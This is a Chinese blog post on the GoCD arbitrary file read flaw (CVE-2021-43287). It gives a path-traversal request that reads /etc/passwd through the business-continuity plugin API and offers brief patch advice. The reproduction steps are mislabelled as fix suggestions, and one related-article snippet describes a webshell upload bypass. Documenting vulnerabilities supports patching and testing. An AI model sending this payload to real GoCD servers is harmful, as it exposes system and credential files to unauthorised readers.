GoCD任意文件读取(cve_2021_43287)

最新推荐文章于 2024-08-09 16:58:05 发布
最新推荐文章于 2024-08-09 16:58:05 发布
阅读量355 收藏 6
点赞数 7
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135292808
版权

漏洞描述:

 GoCD 一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。 GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。

修复建议:

1.访问ip:port

2.修改get请求,读取/etc/passed

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd

 

修复建议:

1.升级

2.打补丁

3.上设备

慕筱蚺
关注
  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
持续集成、持续交付GoCD中文网开通啦
Marswill
03-16 7421
如果大家使用过Jenkins那么相信大家对于持续集成非常熟悉。今天要给大家介绍的是另一个非常强大的CD工具GoCD官方对其也称之为GO但是要明白他和go语言golang是没有多大关系的,他是使用java语言开发的。如果你真在使用Jenkins你肯定在疑惑为什么要使用GoCD那么我把他们的异同告诉大家: 先贴GoCD中文网地址https://gocd.org.cn 中文文档地址:htt...
GoCD(一)安装和简单使用
勤不了一点
08-23 2727
免费和开源的持续集成和持续交付系统(CI/CD )
PTB-CVE
zip471642048的博客
05-05 1001
文章目录Apache HTTPD 多后缀解析漏洞 Apache HTTPD 多后缀解析漏洞 如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 上传一个以jpg为后缀的一句话木马但是包含.php 会被成功解析成php ...
GoCD plugin 任意文件读取漏洞 CVE-2021-43287
weixin_44522540的博客
09-07 519
GoCD任意文件读取
CVE-2021-43287 GoCD任意文件读取 漏洞复现
m0_58596609的博客
12-29 2248
CVE-2021-43287 GoCD任意文件读取 漏洞复现
gocd_docker_compose_example:一个简单的GoCD演示环境,使用docker-compose和yaml管道作为代码
01-30
GoCD基础架构即代码 一个简单的演示环境,该环境完全通过 /外部工具(gomatic)/通过XML配置文件自行配置并添加了构建管道(作为代码),例如作为配置。 版本 即装即用的服务器和代理容器+提供服务器的脚本(需要为...
gocd_dummy:gocd 虚拟仓库
06-12
gocd_dummy gocd 虚拟仓库
Java_GoCD持续交付服务器主存储库.zip
05-22
在 `gocd_master.zip` 文件中,可能包含了配置示例、模板和文档,帮助用户设置和管理针对 Java 应用的 GoCD 流水线。 1. **配置 GoCD 服务器**:要开始使用 GoCD,你需要安装服务器并在服务器上配置代理(Agents)...
docker-gocd-server:GoCD的Docker服务器映像
05-05
GoCD Server Docker映像用于基于高山的。有问题,反馈吗? 请确保将其登录到 。用法使用以下命令启动容器: docker run -d -p8153:8153 gocd/gocd-server:v21.2.0 这会将容器端口8153(http)暴露到您的服务器上。 ...
go-artifactory-plugin:GoCD的Artifactory插件
02-05
ThoughtWorks 插件 该项目是该插件的版本的简化分支,因为他不再更新其版本,并且与GoCD最新版本(> = ...下载[plugin jar](修复此文件),然后复制到GoCD服务器上的plugins / external目录中,然后重新启动。 有关
Java后端处理前端字符串与 JSON 数据:安全拼接与转义技巧
服务员的博客
08-09 156
在 Spring Boot 中处理前端传递的字符串和 JSON 数据时,需要注意潜在的 JSON 特殊字符问题。我们可以通过手动转义或借助 Jackson 库来安全地拼接字符串和 JSON 数据,确保数据完整性和程序稳定性。希望本文能够帮助您更好地理解 Spring Boot 中字符串与 JSON 数据处理的相关技巧,并在实际项目中得心应手。
CVE-2024-38077】核弹级Windows RCE漏洞如何自检并修复该漏洞(附批量漏洞检测工具及分析伪代码)
m0_62783065的博客
08-09 3438
CVE-2024-38077】核弹级RCE漏洞如何自检并修复该漏洞(附原文内分析伪代码)
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-09 393
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1079
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
如何确保场外个股期权交易的安全
Lunasi的博客
08-07 109
只选择那些拥有合法金融牌照、受到监管机构严格监督的平台进行交易,确保在中国交易时,平台已获得证监会或相关金融监管机构的批准。:深入学习期权的基础知识,包括不同类型的期权、它们的权利和义务、定价方式以及风险特性,从而提升自我保护的能力。:在交易前,深入分析市场趋势和相关股票的基本面,评估潜在风险,并制定相应的风险管理策略。通过这些措施,投资者可以在场外个股期权交易中提高交易的安全性,有效降低不必要的风险。:选择流动性好的期权进行交易,以便在需要时能快速买卖,减少因流动性不足带来的风险。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
访问网站显示不安全如何处理
最新发布
playis的博客
08-09 209
当访问网站时浏览器提示“不安全”,这通常是由于多种原因造成的。
8月5日学习笔记 glibc安装与安全用户角色权限
weixin_70751701的博客
08-05 1132
安装步骤1.安装依赖库# 添加开机启动Enter password: # 输⼊123or \g.or \g.#重启服务# 有套接字⽂件,就可以链接mysql服务or \g.owners.Type 'help;mysql>```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值